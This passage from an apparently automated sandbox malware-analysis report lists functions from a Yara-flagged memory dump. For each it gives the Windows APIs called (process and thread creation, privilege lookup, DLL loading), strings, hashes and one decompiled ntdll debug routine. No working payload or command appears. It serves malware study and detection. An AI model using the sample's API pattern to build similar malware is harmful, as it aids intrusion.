                                            • Opcode Fuzzy Hash: dbdfa47433bd3c693f2554cc057ea5b0e37f8f80de9db38fc3c7998424d57d2a
                                            • Instruction Fuzzy Hash: D4318EB6641604ABC711EF64D8A0FABFBB9EF48700F44815DFA1A9B241D770A446CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B172E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 87sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02B17398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 62d40d5683f4b1c92f39604481b1177e89e67d67e8a7f6184a6982c29dffd94b
                                            • Instruction ID: 214655966749a4a531c022c1d59c7265a419c3972ff2594217ffbfef2e75aeac
                                            • Opcode Fuzzy Hash: 62d40d5683f4b1c92f39604481b1177e89e67d67e8a7f6184a6982c29dffd94b
                                            • Instruction Fuzzy Hash: AA31DF72541600ABC711EF64D8A1FABFBB9EF48700F8481A9FA199B241D770A446CFE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B1894D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 3b9400cd3029f16b745976e5e44c286214ff15311656fdd616e494c20aecd6f2
                                            • Instruction ID: b1e7fbf486f7b8e41951d8d71023aa3f31906dd18e86de34dd9efe388bb24a76
                                            • Opcode Fuzzy Hash: 3b9400cd3029f16b745976e5e44c286214ff15311656fdd616e494c20aecd6f2
                                            • Instruction Fuzzy Hash: DDF08C712042046BDB14DFA89C58FE77BA9AF88750F104999FD5C9B242C531E910CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B188E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: eab650859a917897d1b8c68cad4ccc6163da26247c89d90492163c54ebddc794
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 14E046B1200208BBDB18EF99CC48EA777ADEF88750F018598FE089B241C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B07280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B072DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B072FB
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                            • Instruction ID: 193343ac9bde109fdfd41db8778961f7ae41b79ad2d00451eb017cac79a0ac35
                                            • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                            • Instruction Fuzzy Hash: 8401A771A8022877E721B6948C42FBEBB6C9F05F51F154194FF04BA1C1EA94790586F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B07253, Relevance: 3.0, APIs: 2, Instructions: 47threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B072DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B072FB
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                            • Instruction ID: 20f17bbc8b75ca521dbabef8f5ac40657a00860f732f80de505b6b7e6a109143
                                            • Opcode Fuzzy Hash: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                            • Instruction Fuzzy Hash: 00F04672B8021936E62265502C42FFEF3489B44B50F5900F9FF44EB1C0FE90A80646F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B09B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B09BA2
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: 86c34b392a70d5eaed4f8c2aef4ed5c8d6fb71717848b2946c658ffce8c2db9c
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 74011EB5E0020DABDF10DAA4DC81F9DB7799F54708F1081E5E90897281F671EB14CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B18950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B189A4
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: da354fbe37fb7e2fe797abf629c6b4dcbfc1741c649b11708f6bd63ba829fec7
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 0B01AFB2210108BBCB58DF89DC84EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B17420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B0CCE0,?,?), ref: 02B1745C
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                            • Instruction ID: 4143b3ee228290fa14bb866d7a7a68ea8aeedf20e5aa383b521854deebd31508
                                            • Opcode Fuzzy Hash: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                            • Instruction Fuzzy Hash: F8E092333803043AE3306599AC02FA7B79CCB85B20F540066FB0DEB2C0E995F80146A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B17413, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B0CCE0,?,?), ref: 02B1745C
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                            • Instruction ID: d99d9f6922705a06c0c4d03dabcbb7fe46e7f3563e9d19343d5993181c71cf97
                                            • Opcode Fuzzy Hash: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                            • Instruction Fuzzy Hash: DEF02B336903403AD3306AA84C43FE7BBE88B91F10F9801ADF649FB2C1D991F4014664
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B18A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B0CFB2,02B0CFB2,?,00000000,?,?), ref: 02B18A70
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: de5a78040ad7ab25810946c40f385756d6242e17b4adecc08d93efb98f0bdadc
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 1BE01AB12002086BDB14DF49CC84EE737ADAF88650F018154BE0857241C930E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B188A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02B13526,?,02B13C9F,02B13C9F,?,02B13526,?,?,?,?,?,00000000,00000000,?), ref: 02B188CD
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 46f2c0d2cead561ef4c7c832e0be5ad47bc733c6c0fa651a656e9fbf3f1804a8
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: BEE012B1200208ABDB18EF99CC44EA777ADAF88650F118598BE089B241C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02B0D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02B07C83,?), ref: 02B0D44B
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction ID: b472a888c1aac6d40761063b993e48060b120f265a9f61755b4dc2b604867786
                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction Fuzzy Hash: 3BD0A7727503043BE610FAE49C03F2676CD9B44B04F4940B4F948D73C3EA54F4004571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0457967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7a3782d0a89eede3fd81b7af9b73a05e2da41d2b2bb7cab550adefa8614ea6b2
                                            • Instruction ID: cc0ad41bf6da2cea570882f38d65d6c41a29a2c4da2f9004fda85cecc3935dc2
                                            • Opcode Fuzzy Hash: 7a3782d0a89eede3fd81b7af9b73a05e2da41d2b2bb7cab550adefa8614ea6b2
                                            • Instruction Fuzzy Hash: AEB02BB18010C0C5F700E7605608F17394077E0300F12C021D1020240A0738D080F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 045CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E045CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0457CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E045C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E045C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x045cfdda
                                            0x045cfde2
                                            0x045cfde5
                                            0x045cfdec
                                            0x045cfdfa
                                            0x045cfdff
                                            0x045cfe0a
                                            0x045cfe0f
                                            0x045cfe17
                                            0x045cfe1e
                                            0x045cfe19
                                            0x045cfe19
                                            0x045cfe19
                                            0x045cfe20
                                            0x045cfe21
                                            0x045cfe22
                                            0x045cfe25
                                            0x045cfe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045CFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045CFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045CFE2B
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 2c33ee70a7ef96822eb9181147046f44c7dac220ad25632fe5dcf0c43fc72bf0
                                            • Instruction ID: 6a5f15c3935c1134637a669a25b642b44c3ca8232b420d1fca78fc7876ccb2d2
                                            • Opcode Fuzzy Hash: 2c33ee70a7ef96822eb9181147046f44c7dac220ad25632fe5dcf0c43fc72bf0
                                            • Instruction Fuzzy Hash: 5BF0F637240211BFE6211A85DC06F23BB5AFB85770F244319F628561E1EA62F860E6F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%